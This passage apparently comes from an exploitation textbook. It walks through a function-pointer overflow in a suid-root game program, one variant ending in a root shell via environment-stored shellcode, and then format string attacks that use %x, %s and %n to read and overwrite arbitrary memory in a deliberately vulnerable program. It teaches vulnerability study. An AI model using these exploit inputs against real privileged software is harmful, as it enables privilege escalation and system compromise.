2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 50 credits] ->

Thanks for playing! Bye.

reader@hacking:~/booksrc $

This same technique can be used to script everything needed for the exploit. The following line will play the Pick a Number game once, then change the username to 100 A's followed by the address of the jackpot() function. This will overflow the current_game function pointer, so when the Pick a Number game is played again, the jackpot() function is called directly.

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\

x8d\x04\x08\n" . "1\nn\n" . "7\n"'

1

5

n

5

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAp?

1

n

7

reader@hack ing:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\

x8d\x04\x08\n" . "1\nn\n" . "7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 50 credits] ->

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######

This game costs 10 credits to play. Simply pick a number

between 1 and 20, and if you pick the winning number, you

will win the jackpot of 100 credits!

10 credits have been deducted from your account.

Pick a number between 1 and 20: The winning number is 15

Sorry, you didn't win.

You now have 40 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 40 credits] ->

Change user name

Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 40 credits] ->

[DEBUG] current_game po inter @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 140 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 140 credits] ->

Thanks for playing! Bye.

reader@hacking:~/booksrc $

After confirming that this method works, it can be expanded upon to gain any number of credits.

reader@hacking:~/booksrc $ perl -e 'print "1\n5\nn\n5\n" . "A"x100 . "\x70\

x8d\x04\x08\n" . "1\n" . "y\n"x10 . "n\n5\nJon Erickson\n7\n"' | ./

game_of_chance

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 140 credits] ->

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######

This game costs 10 credits to play. Simply pick a number

between 1 and 20, and if you pick the winning number, you

will win the jackpot of 100 credits!

10 credits have been deducted from your account.

Pick a number between 1 and 20: The winning number is 1

Sorry, you didn't win.

You now have 130 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 130 credits] ->

Change user name

Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 130 credits] ->

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 230 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 330 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 430 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 530 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 630 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 730 credits

Would you like to play aga in? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 830 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 930 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 1030 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 1130 credits

Would you like to play again? (y/n)

[DEBUG] current_game pointer @ 0x08048d70

*+*+*+*+*+* JACKPOT *+*+*+*+*+*

You have won the jackpot of 100 credits!

You now have 1230 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 1230 credits] ->

Change user name

Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 1230 credits] ->

Thanks for playing! Bye.

reader@hacking:~/booksrc $

As you might have already noticed, this program also runs suid root. This means shellcode can be used to do a lot more than win free credits. As with the stack-based overflow, shellcode can be stashed in an environment variable. After building a suitable exploit buffer, the buffer is piped to the game_of_chance's standard input. Notice the dash argument following the exploit buffer in the cat command. This tells the cat program to send standard input after the exploit buffer, returning control of the input. Even though the root shell doesn't display its prompt, it is still accessible and still escalates privileges.

reader@hacking:~/booksrc $ export SHELLCODE=$(cat ./shellcode.bin)

reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./game_of_chance

SHELLCODE will be at 0xbffff9e0

reader@hacking:~/booksrc $ perl -e 'print "1\n7\nn\n5\n" . "A"x100 . "\xe0\

xf9\xff\xbf\n" . "1\n"' > exploit_buffer

reader@hacking:~/booksrc $ cat exploit_buffer - | ./game_of_chance

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 70 credits] ->

[DEBUG] current_game pointer @ 0x08048fde

####### Pick a Number ######

This game costs 10 credits to play. Simply pick a number

between 1 and 20, and if you pick the winning number, you

will win the jackpot of 100 credits!

10 credits have been deducted from your account.

Pick a number between 1 and 20: The winning number is 2

Sorry, you didn't win.

You now have 60 credits

Would you like to play again? (y/n) -=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: Jon Erickson]

[You have 60 credits] ->

Change user name

Enter your new name: Your name has been changed.

-=[ Game of Chance Menu ]=-

1 - Play the Pick a Number game

2 - Play the No Match Dealer game

3 - Play the Find the Ace game

4 - View current high score

5 - Change your user name

6 - Reset your account at 100 credits

7 - Quit

[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAp?]

[You have 60 credits] ->

[DEBUG] current_game pointer @ 0xbffff9e0

whoami

root

id

uid=0(root) gid=999(reader)

groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(

plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(re

ader)

Format Strings

A format string exploit is another technique you can use to gain control of a privileged program. Like buffer overflow exploits, format string exploits also depend on programming mistakes that may not appear to have an obvious impact on security. Luckily for programmers, once the technique is known, it's fairly easy to spot format string vulnerabilities and eliminate them. Although format string vulnerabilities aren't very common anymore, the following techniques can also be used in other situations.

Format Parameters

You should be fairly familiar with basic format strings by now. They have been used extensively with functions like printf() in previous programs. A function that uses format strings, such as printf(), simply evaluates the format string passed to it and performs a special action each time a format parameter is encountered. Each format parameter expects an additional variable to be passed, so if there are three format parameters in a format string, there should be three more arguments to the function (in addition to the format string argument).

Recall the various format parameters explained in the previous chapter.

Parameter

Input Type

Output Type

%d

Value

Decimal

%u

Value

Unsigned decimal

%x

Value

Hexadecimal

%s

Pointer

String

%n

Pointer

Number of bytes written so far

The previous chapter demonstrated the use of the more common format parameters, but neglected the less common %n format parameter. The fmt_uncommon.c code demonstrates its use.

fmt_uncommon.c

#include <stdio.h>

#include <stdlib.h>

int main() {

int A = 5, B = 7, count_one, count_two;

// Example of a %n format string

printf("The number of bytes written up to this point X%n is being stored in

count_one, and the number of bytes up to here X%n is being stored in

count_two.\n", &count_one, &count_two);

printf("count_one: %d\n", count_one);

printf("count_two: %d\n", count_two);

// Stack example

printf("A is %d and is at %08x. B is %x.\n", A, &A, B);

exit(0);

}

This program uses two %n format parameters in its printf() statement. The following is the output of the program's compilation and execution.

reader@hacking:~/booksrc $ gcc fmt_uncommon.c

reader@hacking:~/booksrc $ ./a.out

The number of bytes written up to this point X is being stored in count_one, and the

number of

bytes up to here X is being stored in count_two.

count_one: 46

count_two: 113

A is 5 and is at bffff7f4. B is 7.

reader@hacking:~/booksrc $

The %n format parameter is unique in that it writes data without displaying anything, as opposed to reading and then displaying data. When a format function encounters a %n format parameter, it writes the number of bytes that have been written by the function to the address in the corresponding function argument. In fmt_uncommon, this is done in two places, and the unary address operator is used to write this data into the variables count_one and count_two, respectively. The values are then outputted, revealing that 46 bytes are found before the first %n and 113 before the second.

The stack example at the end is a convenient segue into an explanation of the stack's role with format strings:

printf("A is %d and is at %08x. B is %x.\n", A, &A, B);

When this printf() function is called (as with any function), the arguments are pushed to the stack in reverse order. First the value of B, then the address of A, then the value of A, and finally the address of the format string.

The stack will look like the diagram here.

The format function iterates through the format string one character at a time. If the character isn't the beginning of a format parameter (which is designated by the percent sign), the character is copied to the output. If a format parameter is encountered, the appropriate action is taken, using the argument in the stack corresponding to that parameter.

Figure 0x300-3.

But what if only two arguments are pushed to the stack with a format string that uses three format parameters? Try removing the last argument from the printf() line for the stack example so it matches the line shown below.

printf("A is %d and is at %08x. B is %x.\n", A, &A);

This can be done in an editor or with a little bit of sed magic.

reader@hacking:~/booksrc $ sed -e 's/, B)/)/' fmt_uncommon.c > fmt_uncommon2.c

reader@hacking:~/booksrc $ diff fmt_uncommon.c fmt_uncommon2.c

14c14

< printf("A is %d and is at %08x. B is %x.\n", A, &A, B);

---

> printf("A is %d and is at %08x. B is %x.\n", A, &A);

reader@hacking:~/booksrc $ gcc fmt_uncommon2.c

reader@hacking:~/booksrc $ ./a.out

The number of bytes written up to this point X is being stored in count_one, and the

number of

bytes up to here X is being stored in count_two.

count_one: 46

count_two: 113

A is 5 and is at bffffc24. B is b7fd6ff4.

reader@hacking:~/booksrc $

The result is b7fd6ff4. What the hell is b7fd6ff4? It turns out that since there wasn't a value pushed to the stack, the format function just pulled data from where the third argument should have been (by adding to the current frame pointer). This means 0xb7fd6ff4 is the first value found below the stack frame for the format function.

This is an interesting detail that should be remembered. It certainly would be a lot more useful if there were a way to control either the number of arguments passed to or expected by a format function. Luckily, there is a fairly common programming mistake that allows for the latter.

The Format String Vulnerability

Sometimes programmers use printf(string) instead of printf("%s", string) to print strings. Functionally, this works fine. The format function is passed the address of the string, as opposed to the address of a format string, and it iterates through the string, printing each character. Examples of both methods are shown in fmt_vuln.c.

fmt_vuln.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

int main(int argc, char *argv[]) {

char text[1024];

static int test_val = -72;

if(argc < 2) {

printf("Usage: %s <text to print>\n", argv[0]);

exit(0);

}

strcpy(text, argv[1]);

printf("The right way to print user-controlled input:\n");

printf("%s", text);

printf("\nThe wrong way to print user-controlled input:\n");

printf(text);

printf("\n");

// Debug output

printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val,

test_val);

exit(0);

}

The following output shows the compilation and execution of fmt_vuln.c.

reader@hacking:~/booksrc $ gcc -o fmt_vuln fmt_vuln.c

reader@hacking:~/booksrc $ sudo chown root:root ./fmt_vuln

reader@hacking:~/booksrc $ sudo chmod u+s ./fmt_vuln

reader@hacking:~/booksrc $ ./fmt_vuln testing

The right way to print user-controlled input:

testing

The wrong way to print user-controlled input:

testing

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

Both methods seem to work with the string testing. But what happens if the string contains a format parameter? The format function should try to evaluate the format parameter and access the appropriate function argument by adding to the frame pointer. But as we saw earlier, if the appropriate function argument isn't there, adding to the frame pointer will reference a piece of memory in a preceding stack frame.

reader@hacking:~/booksrc $ ./fmt_vuln testing %x

The right way to print user-controlled input:

testing%x

The wrong way to print user-controlled input:

testingbffff3e0

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

When the %x format parameter was used, the hexadecimal representation of a four-byte word in the stack was printed. This process can be used repeatedly to examine stack memory.

reader@hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "%08x."x40')

The right way to print user-controlled input:

%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x

.%08x.

%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x

.%08x.

%08x.%08x.

The wrong way to print user-controlled input:

bffff320.b7fe75fc.00000000.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e

.30252

e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e

.30252e78.2

52e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78

.252e78

38.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

This is what the lower stack memory looks like. Remember that each four-byte word is backward, due to the little-endian architecture. The bytes 0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot. Wonder what those bytes are?

reader@hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n"

%08x.

reader@hacking:~/booksrc $

As you can see, they're the memory for the format string itself. Because the format function will always be on the highest stack frame, as long as the format string has been stored anywhere on the stack, it will be located below the current frame pointer (at a higher memory address). This fact can be used to control arguments to the format function. It is particularly useful if format parameters that pass by reference are used, such as %s or %n.

Reading from Arbitrary Memory Addresses

The %s format parameter can be used to read from arbitrary memory addresses. Since it's possible to read the data of the original format string, part of the original format string can be used to supply an address to the %s format parameter, as shown here:

reader@hacking:~/booksrc $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x

The right way to print user-controlled input:

AAAA%08x.%08x.%08x.%08x

The wrong way to print user-controlled input:

AAAAbffff3d0.b7fe75fc.00000000.41414141

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

The four bytes of 0x41 indicate that the fourth format parameter is reading from the beginning of the format string to get its data. If the fourth format parameter is %s instead of %x, the format function will attempt to print the string located at 0x41414141. This will cause the program to crash in a segmentation fault, since this isn't a valid address. But if a valid memory address is used, this process could be used to read a string found at that memory address.

reader@hacking:~/booksrc $ env | grep PATH

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

reader@hacking:~/booksrc $ ./getenvaddr PATH ./fmt_vuln

PATH will be at 0xbffffdd7

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s

The right way to print user-controlled input:

????%08x.%08x.%08x.%s

The wrong way to print user-controlled input:

????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:

/bin:/

usr/games

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

Here the getenvaddr program is used to get the address for the environment variable PATH. Since the program name fmt_vuln is two bytes less than getenvaddr, four is added to the address, and the bytes are reversed due to the byte ordering. The fourth format parameter of %s reads from the beginning of the format string, thinking it's the address that was passed as a function argument. Since this address is the address of the PATH environment variable, it is printed as if a pointer to the environment variable were passed to printf().

Now that the distance between the end of the stack frame and the beginning of the format string memory is known, the field-width arguments can be omitted in the %x format parameters. These format parameters are only needed to step through memory. Using this technique, any memory address can be examined as a string.

Writing to Arbitrary Memory Addresses

If the %s format parameter can be used to read an arbitrary memory address, you should be able to use the same technique with %n to write to an arbitrary memory address. Now things are getting interesting.

The test_val variable has been printing its address and value in the debug statement of the vulnerable fmt_vuln.c program, just begging to be overwritten. The test variable is located at 0x08049794, so by using a similar technique, you should be able to write to the variable.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xd7\xfd\xff\xbf")%08x.%08x.%08x.%s

The right way to print user-controlled input:

????%08x.%08x.%08x.%s

The wrong way to print user-controlled input:

????bffff3d0.b7fe75fc.00000000./usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:

/bin:/

usr/games

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%08x.%08x.%08x.%n

The right way to print user-controlled input:

??%08x.%08x.%08x.%n

The wrong way to print user-controlled input:

??bffff3d0.b7fe75fc.00000000.

[*] test_val @ 0x08049794 = 31 0x0000001f

reader@hacking:~/booksrc $

As this shows, the test_val variable can indeed be overwritten using the %n format parameter. The resulting value in the test variable depends on the number of bytes written before the %n. This can be controlled to a greater degree by manipulating the field width option.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%x%n

The right way to print user-controlled input:

??%x%x%x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc0

[*] test_val @ 0x08049794 = 21 0x00000015

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%100x%n

The right way to print user-controlled input:

??%x%x%100x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc

0

[*] test_val @ 0x08049794 = 120 0x00000078

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%180x%n

The right way to print user-controlled input:

??%x%x%180x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc

0

[*] test_val @ 0x08049794 = 200 0x000000c8

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%400x%n

The right way to print user-controlled input:

??%x%x%400x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc

0

[*] test_val @ 0x08049794 = 420 0x000001a4

reader@hacking:~/booksrc $

By manipulating the field-width option of one of the format parameters before the %n, a certain number of blank spaces can be inserted, resulting in the output having some blank lines. These lines, in turn, can be used to control the number of bytes written before the %n format parameter. This approach will work for small numbers, but it won't work for larger ones, like memory addresses.

Looking at the hexadecimal representation of the test_val value, it's apparent that the least significant byte can be controlled fairly well. (Remember that the least significant byte is actually located in the first byte of the fourbyte word of memory.) This detail can be used to write an entire address. If four writes are done at sequential memory addresses, the least significant byte can be written to each byte of a four-byte word, as shown here:

Memory 94 95 96 97

First write to 0x08049794 AA 00 00 00

Second write to 0x08049795 BB 00 00 00

Third write to 0x08049796 CC 00 00 00

Fourth write to 0x08049797 DD 00 00 00

Result AA BB CC DD

As an example, let's try to write the address 0xDDCCBBAA into the test variable. In memory, the first byte of the test variable should be 0xAA, then 0xBB, then 0xCC, and finally 0xDD. Four separate writes to the memory addresses 0x08049794, 0x08049795, 0x08049796, and 0x08049797 should accomplish this. The first write will write the value 0x000000aa, the second 0x000000bb, the third 0x000000cc, and finally 0x000000dd.

The first write should be easy.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%8x%n

The right way to print user-controlled input:

??%x%x%8x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc 0

[*] test_val @ 0x08049794 = 28 0x0000001c

reader@hacking:~/booksrc $ gdb -q

(gdb) p 0xaa - 28 + 8

$1 = 150

(gdb) quit

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08")%x%x%150x%n

The right way to print user-controlled input:

??%x%x%150x%n

The wrong way to print user-controlled input:

??bffff3d0b7fe75fc

0

[*] test_val @ 0x08049794 = 170 0x000000aa

reader@hacking:~/booksrc $

The last %x format parameter uses 8 as the field width to standardize the output. This is essentially reading a random DWORD from the stack, which could output anywhere from 1 to 8 characters. Since the first overwrite puts 28 into test_val, using 150 as the field width instead of 8 should control the least significant byte of test_val to 0xAA.

Now for the next write. Another argument is needed for another %xformat parameter to increment the byte count to 187, which is 0xBB in decimal. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049754. Since this is all still in the memory of the format string, it can be easily controlled. The word JUNK is four bytes long and will work fine.

After that, the next memory address to be written to, 0x08049755, should be put into memory so the second %n format parameter can access it. This means the beginning of the format string should consist of the target memory address, four bytes of junk, and then the target memory address plus one. But all of these bytes of memory are also printed by the format function, thus incrementing the byte counter used for the %n format parameter. This is getting tricky.

Perhaps we should think about the beginning of the format string ahead of time. The goal is to have four writes. Each one will need to have a memory address passed to it, and among them all, four bytes of junk are needed to properly increment the byte counter for the %n format parameters. The first %x format parameter can use the four bytes found before the format string itself, but the remaining three will need to be supplied data. For the entire write procedure, the beginning of the format string should look like this:

Figure 0x300-4.

Let's give it a try.

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\

x96\

x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%8x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%8x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0

[*] test_val @ 0x08049794 = 52 0x00000034

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xaa - 52 + 8"

$1 = 126

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\

x96\

x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%126x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3c0b7fe75fc

0

[*] test_val @ 0x08049794 = 170 0x000000aa

reader@hacking:~/booksrc $

The addresses and junk data at the beginning of the format string changed the value of the necessary field width option for the %x format parameter. However, this is easily recalculated using the same method as before. Another way this could have been done is to subtract 24 from the previous field width value of 150, since 6 new 4-byte words have been added to the front of the format string.

Now that all the memory is set up ahead of time in the beginning of the format string, the second write should be simple.

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbb - 0xaa"

$1 = 17

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\

x96\

x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3b0b7fe75fc

0 4b4e554a

[*] test_val @ 0x08049794 = 48042 0x0000bbaa

reader@hacking:~/booksrc $

The next desired value for the least significant byte is 0xBB. A hexadecimal calculator quickly shows that 17 more bytes need to be written before the next %n format parameter. Since memory has already been set up for a %x format parameter, it's simple to write 17 bytes using the field width option.

This process can be repeated for the third and fourth writes.

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcc - 0xbb"

$1 = 17

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xdd - 0xcc"

$1 = 17

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\

x96\

x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%126x%n%17x%n%17x%n%17x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%126x%n%17x%n%17x%n%17x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3b0b7fe75fc

0 4b4e554a 4b4e554a 4b4e554a

[*] test_val @ 0x08049794 = -573785174 0xddccbbaa

reader@hacking:~/booksrc $

By controlling the least significant byte and performing four writes, an entire address can be written to any memory address. It should be noted that the three bytes found after the target address will also be overwritten using this technique. This can be quickly explored by statically declaring another initialized variable called next_val, right after test_val, and also displaying this value in the debug output. The changes can be made in an editor or with some more sed magic.

Here, next_val is initialized with the value 0x11111111, so the effect of the write operations on it will be apparent.

reader@hacking:~/booksrc $ sed -e 's/72;/72, next_val = 0x11111111;/;/@/{h;s/test/next/

g;x;G}'

fmt_vuln.c > fmt_vuln2.c

reader@hacking:~/booksrc $ diff fmt_vuln.c fmt_vuln2.c

7c7

< static int test_val = -72;

---

> static int test_val = -72, next_val = 0x11111111;

27a28

> printf("[*] next_val @ 0x%08x = %d 0x%08x\n", &next_val, next_val, next_val);

reader@hacking:~/booksrc $ gcc -o fmt_vuln2 fmt_vuln2.c

reader@hacking:~/booksrc $ ./fmt_vuln2 test

The right way:

test

The wrong way:

test

[*] test_val @ 0x080497b4 = -72 0xffffffb8

[*] next_val @ 0x080497b8 = 286331153 0x11111111

reader@hacking:~/booksrc $

As the preceding output shows, the code change has also moved the address of the test_val variable. However, next_val is shown to be adjacent to it. For practice, let's write an address into the variable test_val again, using the new address.

Last time, a very convenient address of oxdccbbaa was used. Since each byte is greater than the previous byte, it's easy to increment the byte counter for each byte. But what if an address like 0x0806abcd is used? With this address, the first byte of 0xCD is easy to write using the %n format parameter by outputting 205 bytes total bytes with a field width of 161. But then the next byte to be written is 0xAB, which would need to have 171 bytes outputted. It's easy to increment the byte counter for the %n format parameter, but it's impossible to subtract from it.

reader@hacking:~/booksrc $ ./fmt_vuln2 AAAA%x%x%x%x

The right way to print user-controlled input:

AAAA%x%x%x%x

The wrong way to print user-controlled input:

AAAAbffff3d0b7fe75fc041414141

[*] test_val @ 0x080497f4 = -72 0xffffffb8

[*] next_val @ 0x080497f8 = 286331153 0x11111111

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 5"

$1 = 200

reader@hacking:~/booksrc $ ./fmt_vuln $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\

xf6\

x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%8x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0

[*] test_val @ 0x08049794 = -72 0xffffffb8

reader@hacking:~/booksrc $

reader@hacking:~/booksrc $ ./fmt_vuln2 $(printf "\xf4\x97\x04\x08JUNK\xf5\x97\x04\x08JUNK\

xf6\

x97\x04\x08JUNK\xf7\x97\x04\x08")%x%x%8x%n

The right way to print user-controlled input:

??JUNK??JUNK??JUNK??%x%x%8x%n

The wrong way to print user-controlled input:

??JUNK??JUNK??JUNK??bffff3c0b7fe75fc 0

[*] test_val @ 0x080497f4 = 52 0x00000034

[*] next_val @ 0x080497f8 = 286331153 0x11111111

reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xcd - 52 + 8"

$1 = 161

